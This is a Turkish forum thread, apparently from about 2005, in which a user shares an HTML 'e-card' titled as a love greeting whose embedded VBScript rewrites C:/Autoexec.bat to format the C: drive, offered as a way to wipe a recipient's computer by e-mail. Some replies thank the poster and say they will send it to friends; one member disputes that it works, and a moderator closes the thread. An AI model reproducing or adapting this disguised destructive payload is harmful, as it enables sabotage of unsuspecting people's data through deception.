e-mail den format attırma buyrun

klass24

Banned
Reaction score
0
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Aşkından Sevgilerle</title>
</head>
<bOdy>
<script language="VBSCRIPT">
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:/Autoexec.bat", True)
a.WriteLine("format c: /autotest /u /q")
a.Close
</script>
<p>Giriste ac1lan uyariya "HAYIR" dediyseniz <a
href= "<i>javascript</i>:reload()">Malesef e-kart 1n1z cal1smayacakt1r.</p>
</bOdy>
</html>

Bu kodları mail ile yolluyacaksınız evet veya hayır die bişi sorcak eleman evet derse C:’sine elvade diyecek.Şimdilik sadece windows 98’lerde oluyor

sen denedinmi oluyormuu ?

sadece win98 mi kulanan kaldımıkii 98 i :)

ben denedim arkadaşım yöntem çalışıyor 98 kullananlar varmı diye sorarsan şirketlerin çoğu hala 98 kullanmakta hatta bir çoğu

eywallah kardeşim bende 98 etkilicek bişiler arıyodum şimdi ark yollıcam acarsa 10 dk sonra cvp yazarım

aga 98 kullanan bulursan sen at varsa xp ıyı olurdu aslında yınede paylasım ıyı saol

arkadaşlar şimdilik 98 için ama ilerde xp içinde olacak merak etmeyin

vay be demek ilerde
xp ıcınde olanıda koyucaksın
bak sen
ama
bu söyldiğini artık
bilmem kaç defa birileri
bilmem kaç defa verdi
cevabını ise artık
vermiyorum
dilimde tüy bitti
konu olsun da
sallama olsun dimi
arkadaşlar
ya sabir

güzel kardeşim bundan sonra sana danışırım ya bir konu atacağımda acaba bundan önce bilmem kaç kişi verdimi diye sana danışır öyle atarım olurya veren olur yine senin sabrın falan taşır gördüğün gibi ben daha yeniyim diğer konuları akip etmemi nasıl beklersin ki benden be ne bileyim daha önce verildimi verilmedimi hem verilen cevaplara bakarsan o arkadaşlarda daha yeni haberleri var bu konudan lütfen konuşmak için konuşmayalım

ben avatar yükleyemiyorum arkadaşlar. bilgisayar konusunda çok yeniyim. resmi düzenleden minicik yaptım genede kabul etmiyor sistem. bir diger sorumda internet sayfam hep aynı sayfada açılıyor. nerden ayarlamam gerekiyor. eğer yalnış yere soru yazıyorsam affedin zamanla nereye soru yazacağımı ögrenirim. şimdiden tşkler.

dostum ben sana
nıye verdın burda
zaten vardı demıyorum
ve inan bana forumda
tek muhalefet yapmayan
kişide benimdir
insanlara satşmam merak etme
ama artık sinir olmak işten
değil
bunu aldıgın yerde biraz
daha araştır çunki bu
çalışmayan bir script
aslında script bile degıl
ve denedım deme lutfen bari

Yıl 2005 . Win 98 Kullanan Şahsen benim hiç arkadaşım yok.Kullanan varsa işe yarar BELKİ..!

maybe_' Alıntı:
ya bi moderator bile cevap yazamıyor mu bana burda pc nin başında boş boş oturmak ok kötü... :'(
dostum yardım ıstegın yanlıs yerde
oldugu ıcın cvp alamıyorsun
ekranın en ust sağ tarafında
ozel mesajlarıma gır
ordan solda avatar yuklemeye gır
orta kısımda avata yukleme goruceksın
ıstersen avatarının oldugu sıte url sıını
gırebılırsın yada altında bılgısarımdam yukle
secenegınden
ancak tabi boyutları orda belirtilen
formatta olmalı
basarılar
EDİT:
bu yardım ıstegını lutfen
forumda yukarda YENI BASLAYANLAR YARDIM
BOLUMUNE YAZARSAN CEVABINI ALICAKSIN

saol kardeşim en başta böyle bir konuşma yapsaydın taktir eder özür dilerdim

hocam gerçekten sabrina hayranım ne diim ben bu kadar sabırlı olmazdım helal sana

sabır sabır.........

klass24' Alıntı:
güzel kardeşim bundan sonra sana danışırım ya bir konu atacağımda acaba bundan önce bilmem kaç kişi verdimi diye sana danışır öyle atarım olurya veren olur yine senin sabrın falan taşır gördüğün gibi ben daha yeniyim diğer konuları akip etmemi nasıl beklersin ki benden be ne bileyim daha önce verildimi verilmedimi hem verilen cevaplara bakarsan o arkadaşlarda daha yeni haberleri var bu konudan lütfen konuşmak için konuşmayalım

Kardeşim Konuşmak için konuşmuşma dediğin adam Bu forumda nadiren konuşan ama öz konuşan insanlardan...Konuları takip et demiyor sana orda arama motoru var 98 Windows la ilgili bi rkonunun bugune kadar işlemediğine gelincede mantıksız olmuyormu yani senin bu soylediğin yontemi bugune kadar kimsenin aklına gelipte konmadımı Foruma

Bir Daha başlık açarken Konu ile ilgili biraz mantık yürütün Konu kapandı

Geri